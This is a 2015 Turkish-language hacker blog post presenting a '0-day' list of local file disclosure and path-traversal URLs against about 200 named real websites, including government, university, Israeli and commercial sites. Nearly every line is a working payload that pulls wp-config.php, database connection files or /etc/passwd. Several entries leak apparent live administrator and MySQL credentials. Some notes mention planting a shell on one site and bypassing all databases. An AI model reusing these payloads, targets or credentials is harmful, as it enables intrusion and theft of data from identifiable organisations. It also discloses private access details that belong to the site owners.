7 Mayıs 2015 Perşembe

0-day Bug List! | LFI / RFD | to about 200 WebSites - h4x0re SEC.

It was discovered by KnocKout
h4x0re Security - http://h4x0resec.blogspot.com



Israel 
http://www.nirkotz.com/eng/download.php?file=../include/inc_config.php   - win sunucu - 213 israil sunucu
http://www.infodraw.com/downloads/download.php?file=../download.php    - serv’da tek başına.
http://ahmadiyyamuslimjamaat.in/home/download.php?file=index.php        - 515 site
http://www.treitel.co.il/download.php?file=/kata1/globals.php               - 199 israil sunucusu
( http://www.treitel.co.il/download.php?file=/kata1/includes/Database/Database.php )
http://www.dhl-christmas.co.il/download.php?file=index_old.php      - Israil bbcnews24.com sunucuda
http://yofikoren.co.il/download.php?file=wp-config.php - - 280 site isrial
http://www.informatour.co.il/download_file.php?file=../index.php        - 426 site ISRAIL
-
http://noti.hebreos.net/enlinea/archivos/download.php?file=../wp-config.php - israil wp
http://www.hebreos.net/Chat/force-download.php?file=force-download.php
http://noti.hebreos.net/enlinea/archivos/download.php?file=../../../../../../../etc/passwd
http://noti.hebreos.net/enlinea/archivos/download.php?file=/homepages/12/d93492271/htdocs/noti/enlinea/index.php
-
GOV / EDU

http://www.jalajala.gov.ph/download.php?filename=../configuration.php
http://scinet.dost.gov.ph/union/UploadFiles/download.php?f=../lib/elements/ConnectDB/connectDB.php
http://www.sanremigio.gov.ph/download.php?filename=../database.php
http://184.154.207.210/phpmyadmin/index.php?db=cvisnet_sanremigio&token=2ad23b85171001ca59ce42a57f9dd5ad#PMAURL:db=cvisnet_sanremigio&table=news&target=sql.php&token=2ad23b85171001ca59ce42a57f9dd5ad
http://www.fmf.gov.ba/download.php?id=Connections/fmf_conn.php
http://diniece.me.gov.ar/externo/download.php?archivo=../../../../etc/passwd
http://www.itel.gov.ao/ITEL/Download.php?arquivo=includes/configuracoes.php
http://www.gonzaga.gov.ph/wp-download.php?filename=../../wp-config.php
( / administration - USER: admin - PW: Radeon23 )
-
http://www.usf.gov.jm/download.php?download_file=../../../../etc/passwd
http://www.usf.gov.jm/download.php?download_file=../index.php
-
http://math.colorado.edu/~magr9802/download.php?download_file=../../../../../etc/passwd
http://unc.edu.eg/download.php?file=includes/dalc/connection.php
-
# Almanya Kassel Üniversitesi. / TYPO 3 #
https://www.uni-kassel.de/projekte/typo3/ext/ukinternal/pi1/download.php?dir= LOCAL Direct.
https://www.uni-kassel.de/projekte/typo3/ext/ukinternal/pi1/download.php?dir=../../../index.php
https://www.uni-kassel.de/projekte/typo3/ext/ukinternal/pi1/download.php?dir=../../../tce_db.php
https://www.uni-kassel.de/projekte/typo3/ext/ukinternal/pi1/download.php?dir=../ext_emconf.php
https://www.uni-kassel.de/projekte/typo3/ext/ukinternal/pi1/download.php?dir=../ext_localconf.php
http://www.uni-kassel.de/projekte/typo3/ext/ukinternal/pi1/download.php?dir=../../../../../uni/index.php
https://www.uni-kassel.de/uni/typo3/index.php
http://www.uni-kassel.de/projekte/typo3/ext/ukinternal/pi1/download.php?dir=../../../../../uni/typo3/sysext/install/mod/conf.php
http://www.uni-kassel.de/projekte/typo3/ext/ukinternal/pi1/download.php?dir=../../../../../uni/typo3/sysext/adodb/adodb/server.php

RU

-
http://sansusanin.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
MYSQL: 94.250.249.166/myadmin
sansusanin_2
ZLbjYZPRkjeBS6UCaYeYNqhLsdaIzQxW
-
http://www.ctt74.ru/download.php?id=../cms/includes/config.inc.php
http://www.hermle-vostok.ru/home/download.php?file=../cnf/db.cnf.php - 63 dom
www.isatphone-pro.ru/download.php?file=includes/menu.php
http://www.ezop.ru/download.php?file=../../typo3/index.php
http://www.digis.ru/download.php?file=index.php
http://www.samspace.ru/download.php?file=index.php - rusya uzay - serverda tek- bakacam
http://nordcast.ru/download.php?file=index.php - alısveris
dinaton.ru/download.php?fn=inc-admin/connect.php - alısveris 
www.domus3d-pro.ru/download.php?filename=../../../../../../etc/passwd
perfect-magazine.ru/download.php?file=index.php
http://plastfoil.ru/download.php?file=index.php 

BR 

bes-br.com/wp-content/uploads/download.php?arquivo=../../wp-config.php - 149 brezilya
http://www.sirioantenne.ru/download.php?file=../admin/db_mysql.php

it 

http://www.notaiodoria.it/force.php?dir=../../../../etc/passwd
http://www.notaiodoria.it/force.php?dir=common/common.inc.php
www.hitecsystems.it/force.php?file=index.php
www.cif-formazione.it/force.php?file=index.php
http://www.toccafondi.com/_scripts/download.php?file=_layout/config.php
www.usrlazio.it/_scripts/download.php?file=_layout/config.php

DE 

www.amalienhof-weimar.de/cms/download.php?filename=conf.inc.php
http://www.wassersport-verband.de/cms/download.php?filename=conf.inc.php
www.rebola.de/cms/download.php?filename=conf.inc.php
www.kolpingurlaub-mv.de//cms/download.php?filename=conf.inc.php
http://www.girmscheid.de/download.php?file=index.php
www.flutanlagen.de/modules/download.php?file=../include/db_connect.php
-
http://www.gmp.ww.uni-erlangen.de/download_file.php?file=../../../etc/passwd
http://www.gmp.ww.uni-erlangen.de/download_file.php?file=/var/www/ww1/download_file.php
-
http://www.scharfrichter-haus.de/download_file.php?file=../../config/sql.inc.php
kanzlei-partsch.de/complianceinstitut/download_file.php?file=../cjp/wp-config.php - wp    - hukuk sitesi
http://www.kanzlei-stegmann.de/wp-content/themes/twentyeleven/download.php?file=../../../wp-config.php
phpmyadmin bulunamadı
-
akademie-web.de/wp-content/themes/akademie/download.php?pfad=../../../wp-config.php
http://akademie-web.de/mysqladmin/          - OK - 3306 AÇIK
wp-admin/
myadmin
error
-
greentechgmbh.de/wp-content/themes/gt/download.php?file=../../../wp-config.php
http://www.hermle.de/home/download.php?file=../cnf/db.cnf.php

RONDOM 

http://download.playmobil.com/FunAction/Microsites/Figures/DE/img/anleitung/force-download.php?file=../../../../../../index.php   ONEMLI
http://zurcom.net/download.php?filename=../index.php
http://ballet.ro/wp/download.php?file=wp-config.php
macroworldpub.com/indir.php?dosya=../../../../../../etc/passwd
http://macroworldpub.com/indir.php?dosya=../../../index.php
http://www.cvcnigeria.org/media/force.php?file=../library/config.php
http://www.ascomvenezia.com/force.php?file=common/config.php
-
http://www.vynckier.biz/force.php?file=../../../../../../etc/passwd
http://www.vynckier.biz/force.php?file=../../index.php
www.vynckier.biz/force.php?file=../../../php/config.php
-
http://thisca.com/force.php?file=admin/include/db.ini.php
-
www.genesisauto.gr/force.php?filename=index.php
www.keped.gr/force.php?filename=index.php
www.cytop.gr/force.php?filename=index.php
www.nnaviation.gr/force.php?filename=index.php
www.myrtea.gr/force.php?filename=index.php
-
http://www.carriacoumaroon.com/force.php?file=index.php
http://www.focusfeatures.com/pdf/down.php?downfile=../index.php
http://www.omicsbio.com.tw/down.php?url=common.inc.php
http://www.opto-sensor.com.tw/down.php?url=index.php
http://edu.tta.or.kr/sub3/down.php?No=73&file=../../../../../../etc/passwd - kore üni
www.homeopathyphysician.com/down.php?file=../admin/connectDB.php
-
www.greenbackforex.net/regulatory_update/down.php?file=../config.php
www.greenbackforex.net/regulatory_update/down.php?file=../../../../../../../../../../../../../../etc/group
-
http://www.livekarad.com/wp-content/themes/Newspapertimes_1/download.php?filename=../../../../../../../etc/passwd
http://theggis.com//wp-content/themes/business-essentials-wp/download.php?file=../../../../wp-config.php
http://rmhctAllahassee.org/wp-content/themes/RedSteel/download.php?file=download.php
http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
www.wernerfinley.com/download.php?download_file=wp-config.php
http://grupostt.com/wp-content/themes/stt/noticias/download.php?file=../../../../wp-config.php
http://themessageofchristmas.com/wp-content/themes/githook/themessageofchristmas/pdf/download.php?file=../../../../../wp-config.php
www.icelegacy.com/wp-content/themes/icelegacy/download.php?f=../../../wp-config.php
http://www.pillarhoodriver.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
http://www.vapejjuice.com/wp-content/themes/hustle/down.php?f=../../../wp-config.php
oysterdb.cn/art/supp/ssr/process.php?filename=../../../../../../../etc/passwd
www.smallgroups.net/Downloads/SpiritualGrowthTools/SG-Download-Process.php?file=../../../../../../etc/passwd
http://fitted.ca/docs/process.php?file=../index.php
http://www.optenergy.com/process.php?file=index.php
http://taalforms.com/process.php?filename=index.php
-
http://www.trismegistos.org/downloads/process.php?file=process.php
http://www.trismegistos.org/downloads/process.php?file=../downloads.php
-
www.oruawharo.com/GeneratedItems/process.php?file=../../../../../../etc/passwd
http://kaargocult.webfactional.com/static/linked/process.php?file=process.php
www.veronicatennant.com/cv/process.php?file=process.php
www.multicordes.com/process.php?file=process.php
http://governmenthousefoundationnt.org.au/process.php?file=process.php
http://www.profootballreferee.com/camps_clinics/process.php?file=process.php
http://www.copthorneprep.co.uk/wp-content/themes/copthorne3.0/includes/year3/process.php?file=../../../../../wp-config.php
www.under-dogma.com/process.php?file=index.php
http://www.cpidaylighting.com/save-file.php?f=../../../../../../etc/passwd
www.intelasun.com/save-file.php?f=save-file.php
us.victorsport.com/file.php?f=../../../index.php
www.icms.net.au/tdnews/file.php?file=../../index.php
-
http://ok1ia.nagano.cz/file.php?file=../../index.php       
http://ok1ia.nagano.cz/file.php?file=../../../../../etc/passwd
-
http://www.nszi.hr/admin/file.php?file=../../index.php
http://www.weinerleo.hu/file.php?file=../index.php
www.segis.it/us/downloads.file.php?file=../index.php
http://zurcom.net/download.php?filename=../team.php - isrial
http://www.marcbredenkamp.com/download.php?file=index.php        - wp
http://imcs.pl/force-download.php?file=index.php
http://www.ims.or.kr/BBS/down.php?F=../../index.php          kore akdeniz araştırmaları enstüsü.
iemi.com/doc/downloader.php?file=../index.php
www.makiber.com/download.php?fichero=index.php
-
www.bayanbusiness.com.ph/download.php?download_file=../../download.php
www.bayanbusiness.com.ph/download.php?download_file=../../../../../etc/passwd
http://www.bayanbusiness.com.ph/download.php?download_file=../../db_connect.php
-
www.hollandmarineparts.nl/force.php?file=force.php     - 498 site hollanda
http://www.sustcult.eu/force.php?percorso=index.php                  - 
www.veniceconvention.com/force.php?file=index.php
http://www.conferenceinvenice.com/force.php?file=index.php
http://edibleschoolyard.org/downloads/force.php?file=../index.php          - face 25 bin beğeni
http://motivatedmagazine.com/downloads/force.php?file=../../index.php        - joomla 
www.limetreefarm.co.uk/force.php?file=index.php
summit.fiainstitute.com/summit/force.php?file=../index.php
http://www.substral.no/images/stories/indoor/force.php?file=../../../index.php 
http://www.hotel-gueugnon.com/docs/force.php?doc=../../../../etc/passwd
-
http://www.substral.no/images/stories/indoor/force.php?file=../../../admin/index.php
http://www.substral.no/admin/   - Tamper shell çak.
PW : subs75mp
-
http://www.hotel-gueugnon.com/docs/force.php?doc=../../../../etc/passwd 
http://www.encc.org.eg/download.php?file_name=index.php
http://www.pyramidscapital.com/eng/360download.php?filename=web_track.php
-
10 site var. tüm dbler bypass 
aventurasegura.org.br/wp-content/themes/abeta/download.php?arquivo=../../../wp-config.php
http://www.aventurasegura.org.br/phpmyadmin/
root
ativ2oi3
-
http://www.wetzel.com.br/wp-content/themes/wetzel/file-download.php?file=../../../wp-config.php
esika.com.br/wp-content/themes/nuevaesika/download.php?pdf=../../../wp-config.php   - 6 site
http://mroriz.com.br/wp-content/themes/mRoriz/download.php?filename=../../../../wp-config.php 
-

https://www.lessavantsfous.fr/wp-download.php?file=wp-config.php

Hiç yorum yok:

Yorum Gönder